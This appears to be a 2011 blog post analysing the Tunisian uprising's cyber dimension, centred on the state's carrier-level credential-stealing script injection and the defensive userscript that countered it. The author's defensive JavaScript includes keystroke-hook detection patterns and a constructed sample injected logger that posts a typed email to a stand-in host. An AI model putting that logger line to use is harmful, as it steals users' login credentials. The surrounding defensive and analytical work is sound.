Sixteen days after Ben Ali boarded a flight to Jeddah, and three days into the internet blackout in Egypt, I am still trying to work out what the cyber dimension of Tunisia actually was. Most of the press coverage outside the region has treated it as Anonymous taking down government websites with LOIC, which is the small and dull part of the story. The substantive part is the credential-theft attack the Tunisian Internet Agency ran through the first week of January, the userscript Anonymous-aligned developers shipped against it, and the role Nawaat played as the documentation backbone. None of that fits the Estonia 2007 pattern, or the Russia–Georgia template from 2008, or even the Operation Payback model from December. It is a different shape and worth writing down before the journalism congeals it into a single tidy story.
The trigger was Mohamed Bouazizi's self-immolation in Sidi Bouzid on 17 December and his death on 4 January, but the cable archive from WikiLeaks supplied the second wind. The Tunis embassy cables Robert Godec wrote in 2008 and 2009 — describing Ben Ali's regime as sclerotic, and the dinner with Sakher El Materi at his villa with the pet tiger — were circulating heavily on Tunisian Facebook in the last week of December. There is a fair chunk of academic argument coming about whether the cables really mattered or whether they were post-facto kindling, and that argument is partly missing the point. The cables gave Tunisian users on Facebook something concrete and unimpeachable to share. Ben Ali had been telling his own story for twenty-three years; the cables were a counter-text in his own ally's voice, with a date and a signature.
Anonymous announced Operation Tunisia on 2 January with the usual press-release framing and a target list of government sites. The DDoS phase did happen, and a number of ministry sites were intermittently unreachable over several days. I do not think this was the meaningful part of the operation. The meaningful part was the response to what the ATI was doing.
The ATI had begun, around 4 January, injecting JavaScript into the unencrypted HTTP login pages of Facebook, Gmail and Yahoo as Tunisian users requested them. The injection captured usernames and passwords as the user typed them and posted them to a government-controlled collection point. This is not subtle. It is straight credential phishing run at carrier level, with the man-in-the-middle being the country's only commercial gateway. By the time it was noticed, an unknown number of Tunisian Facebook accounts had been taken over, and a smaller number of bloggers and activists had been arrested using information obtained through them. Slim Amamou, the blogger and Pirate Party member, was one of the people picked up around this time, on 6 January. He was held until Ben Ali fled, and was then, remarkably, appointed Secretary of State for Youth and Sport on 17 January in the transitional government — released from the interrogation cells of the same regime he is now nominally part of, in less than two weeks.
The defensive response within Tunisia is the part I want to remember. An Anonymous-aligned Greasemonkey userscript circulated through #optunisia on IRC and through the Nawaat networks — Sami Ben Gharbia and the Nawaat collective have been the practical hub of all of this — that detected the injected script and stripped it before it could run. Facebook's own response, reconstructed by Alexis Madrigal at the Atlantic last week, was to push every Tunisian login session over HTTPS, which they completed on the evening of 7 January after their security team finally understood the shape of what was happening. So the defensive sequence was userscript first, platform forced-HTTPS second, with the userscript covering the gap between the two. That is the right order morally and operationally, and it is also a working blueprint for responding to any future regime that runs a similar attack: get the in-country defenders a tool first, push the platform later.
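To make the two defensive checks concrete, here is an added example of the kind of logic such a userscript needs: it classifies each script on a login page (off-allowlist external source, or inline code that hooks keystrokes or submission and talks to a foreign host) and refuses to submit a login form whose target is not HTTPS. This is my own illustration, not the circulated userscript and not Facebook's code; the allowlisted hostnames, the sample scripts and the 192.0.2.10 collection address are constructed for the example.

```javascript
// Script hosts a login page is expected to load from (assumed allowlist).
const ALLOWED_SCRIPT_HOSTS = new Set(['www.facebook.com', 'static.ak.fbcdn.net']);
// An injected credential logger has to hook typing or submission ...
const HOOK_RE = /\b(on)?(key(down|up|press)|submit)\b/i;
// ... and ship what it captured to an absolute URL somewhere.
const URL_RE = /https?:\/\/[^\s'"<>)]+/gi;

function hostOf(url) {
  try { return new URL(url).hostname; } catch (e) { return null; } // relative URL
}
function urlHosts(text) {
  return (text.match(URL_RE) || []).map(hostOf).filter(Boolean);
}
// A <script> is suspicious if its src is off the allowlist, or if it is inline
// and both hooks keystrokes/submit and talks to a host off the allowlist.
function classifyScript(script, allowed = ALLOWED_SCRIPT_HOSTS) {
  if (script.src) {
    const host = hostOf(script.src);
    if (host === null) return 'allowed'; // relative src resolves to the page's own origin
    return allowed.has(host) ? 'allowed' : 'suspicious-external';
  }
  const hooks = HOOK_RE.test(script.text);
  const foreign = urlHosts(script.text).some((h) => !allowed.has(h));
  return hooks && foreign ? 'suspicious-inline' : 'allowed';
}
// Credentials must never leave the browser over plain HTTP: an absolute action
// must be https:, a relative or empty action inherits the page's own scheme.
function formPostsOverHttps(form, pageProtocol) {
  const action = form.action || '';
  if (!/^https?:/i.test(action)) return pageProtocol === 'https:';
  return /^https:/i.test(action);
}
// Userscript entry point: strip suspicious scripts, block insecure submits.
function protectPage(doc) {
  const removed = [];
  for (const s of Array.from(doc.scripts)) {
    const verdict = classifyScript({ src: s.getAttribute('src') || '', text: s.text || '' });
    if (verdict !== 'allowed') { removed.push(verdict); s.parentNode.removeChild(s); }
  }
  for (const f of Array.from(doc.forms)) {
    if (formPostsOverHttps({ action: f.getAttribute('action') }, doc.location.protocol)) continue;
    f.addEventListener('submit', (e) => { e.preventDefault(); console.warn('login form posts over http:, blocked'); });
  }
  return removed;
}
// Constructed sample: a legitimate asset and an injected inline logger (192.0.2.10 is a documentation address).
const SAMPLE_SCRIPTS = [
  { src: 'http://static.ak.fbcdn.net/rsrc.php/login.js', text: '' },
  { src: '', text: "document.forms[0].onsubmit=function(){new Image().src='http://192.0.2.10/c.php?u='+encodeURIComponent(email.value)};" },
];
if (typeof document !== 'undefined') protectPage(document);
```

Removing a script element only helps if the userscript runs before the page's own scripts execute, so in Greasemonkey terms it has to run at document start; and an allowlist of script hosts is only as good as its upkeep, so the inline heuristic is the part that catches an injector using a host you did not anticipate.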
Two things from this are going to occupy me through the spring. The first is that the ATI attack was, technically, easy. It is a JavaScript injection at carrier level against unencrypted login forms. There is nothing special about Tunisia's infrastructure that made this possible. The same operation could be run against any country whose major social and email platforms still serve login pages over HTTP, which at the moment is most of them. The implicit defensive claim behind HTTPS Everywhere and the EFF's broader work has been about the privacy of the individual user against ad networks and casual snooping. Tunisia is the demonstration that it is also state-defection insurance. Every login form still served over HTTP is an entry point for a regime that decides, in some particular week, that it would rather know who is talking to whom. I do not yet know how to push this argument through to platform product managers beyond saying it loudly, but it is now substantively easier to make.
The second is whether the template moves. As I write this, Egypt is on day three of a near-total internet blackout. Mubarak ordered the cut late on 27 January, once it was clear that the Friday of Anger was going to outscale anything in Tunisia. This is a different defensive shape: not a regime trying to surveil, but a regime trying to disconnect. If the protests sustain through this, we are going to learn something we could not learn from Tunisia, which is what coordination capacity remains when the carriers are off. There is already discussion of dial-up out of country, and rumours that Google and Twitter are putting together some kind of phone-to-tweet bridge. I expect the next two weeks to be the most informative period for understanding civilian internet defence under hostile regime conditions that I will see in some time.
For the engagements I am working on, the ATI attack has changed the conversation about TLS deployment. "Login pages over HTTPS" used to be a tick-box item on a pen-test report, the kind of thing that gets deferred for a quarter and then forgotten. It is now operationally pressing in a way I can point to with a real example, against a population I can name. I will write about how that lands with the boards I am sitting in front of, with the usual confidentiality, when there is something substantive to say.
The next post is likely to be Egypt, depending on what survives the next week. If the demonstrations sustain into next weekend, I will be reading Andy Carvin and Jillian York for context more than anything else, and watching whether anything resembling the Greasemonkey userscript emerges in the Egyptian shape of the problem.